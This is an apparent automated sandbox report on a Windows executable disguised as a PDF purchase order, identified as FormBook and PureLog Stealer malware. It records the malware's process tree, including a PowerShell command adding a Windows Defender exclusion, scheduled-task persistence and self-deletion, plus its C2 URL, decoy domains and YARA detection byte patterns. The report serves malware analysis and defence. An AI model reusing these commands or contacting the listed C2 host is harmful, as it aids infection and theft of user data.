Edit tour

Windows Analysis Report
RFQ31072024_August order_pdf.exe

Overview

General Information

Sample name:	RFQ31072024_August order_pdf.exe
Analysis ID:	1485185
MD5:	536f359f5908b1a9926b6337c3e520d4
SHA1:	d8b7aa1367b6508e1e4ee99c5e0ba9d15b097219
SHA256:	45bac0cd4b709400f6801f0b6dfaa5eba1d6125d3a859ade0cf2a1e53b637746
Tags:	exe
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

RFQ31072024_August order_pdf.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe" MD5: 536F359F5908B1A9926B6337C3E520D4)

powershell.exe (PID: 7712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7740 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RFQ31072024_August order_pdf.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe" MD5: 536F359F5908B1A9926B6337C3E520D4)

explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

msiexec.exe (PID: 8124 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cmd.exe (PID: 6348 cmdline: /c del "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

autofmt.exe (PID: 2840 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)

autoconv.exe (PID: 6464 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)

systray.exe (PID: 7408 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

EqtGqZpPskFq.exe (PID: 8076 cmdline: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe MD5: 536F359F5908B1A9926B6337C3E520D4)

schtasks.exe (PID: 7192 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EqtGqZpPskFq.exe (PID: 6600 cmdline: "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe" MD5: 536F359F5908B1A9926B6337C3E520D4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ygyqpswy.xyz/ss24/"], "decoy": ["agingwellhc.com", "unikbetanggur.autos", "eb2024yl.top", "ja380.xyz", "thehalcyon.studio", "maudsoogrim.com", "esteler10.click", "mewtcp.xyz", "www-zjbf1.club", "kucinglucu.online", "lunwencheck.com", "65597.photos", "erbxeu358h.top", "startable.online", "yousend.xyz", "csharksg.com", "centricoatings.com", "ntruhslearn.xyz", "achabakra.xyz", "zuntool.com", "jejbtl738a.top", "runebinder.com", "fidogmesvies170s63.online", "online-unicsedritcorp.com", "8208975.com", "supporthq.life", "protocolozeroacne.com", "ocotilloco.com", "xcolbu456t.xyz", "ciclidossi.com", "163875.shop", "strangebedfellowstheatre.com", "unikbetjeruk.homes", "jhlktwyq.xyz", "realearthpower.com", "crucka.xyz", "pkvnvtdb.com", "profitablecasino.com", "uspspsnami.top", "thejerkspices.com", "sivagiriashram.info", "usavisa8loan.xyz", "deoconverter.pro", "investing-courses-66663.bond", "2025tengxun171.lat", "bluebirdbodyworkstudio.com", "siblingstalk.com", "lxcqx.com", "amharicprofessional.pro", "lijiangstory.net", "barflybook.com", "eldesigin.com", "yd81w.top", "head2toe.boutique", "varun.works", "next-genlion.com", "awvd97.com", "derindenizotel.com", "vertibridge.xyz", "qdfake609am.xyz", "acc-pay.top", "qblackbit.com", "pallesudatissime.com", "8548d.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1425810196.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1431768421.0000000006960000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.1502952456.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6bc1:$a1: 3C 30 50 4F 53 54 74 09 40 0x34fe1:$a1: 3C 30 50 4F 53 54 74 09 40 0x62401:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d520:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b940:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78d60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb32f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3974f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x66b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44637:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71a57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa278:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa4e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38698:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38902:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16015:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44435:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43f21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16117:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44537:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1628f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x446af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaefa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3931a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6673a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x191a9:$sqlite3step: 68 34 1C 7B E1 0x192bc:$sqlite3step: 68 34 1C 7B E1 0x475c9:$sqlite3step: 68 34 1C 7B E1 0x476dc:$sqlite3step: 68 34 1C 7B E1 0x749e9:$sqlite3step: 68 34 1C 7B E1 0x74afc:$sqlite3step: 68 34 1C 7B E1 0x191d8:$sqlite3text: 68 38 2A 90 C5 0x192fd:$sqlite3text: 68 38 2A 90 C5 0x475f8:$sqlite3text: 68 38 2A 90 C5 0x4771d:$sqlite3text: 68 38 2A 90 C5 0x74a18:$sqlite3text: 68 38 2A 90 C5 0x74b3d:$sqlite3text: 68 38 2A 90 C5 0x191eb:$sqlite3blob: 68 53 D8 7F 8C 0x19313:$sqlite3blob: 68 53 D8 7F 8C 0x4760b:$sqlite3blob: 68 53 D8 7F 8C 0x47733:$sqlite3blob: 68 53 D8 7F 8C 0x74a2b:$sqlite3blob: 68 53 D8 7F 8C 0x74b53:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7488	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7488	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xbd1ef:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7856	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x40804:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: EqtGqZpPskFq.exe PID: 8076	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: msiexec.exe PID: 8124	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x34b6:$a1: 3C 30 50 4F 53 54 74 09 40 0x10428e:$a1: 3C 30 50 4F 53 54 74 09 40 0x1481c4:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: systray.exe PID: 7408	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xc4be0:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.2.RFQ31072024_August order_pdf.exe.6960000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.EqtGqZpPskFq.exe.2c24420.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.RFQ31072024_August order_pdf.exe.2514450.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
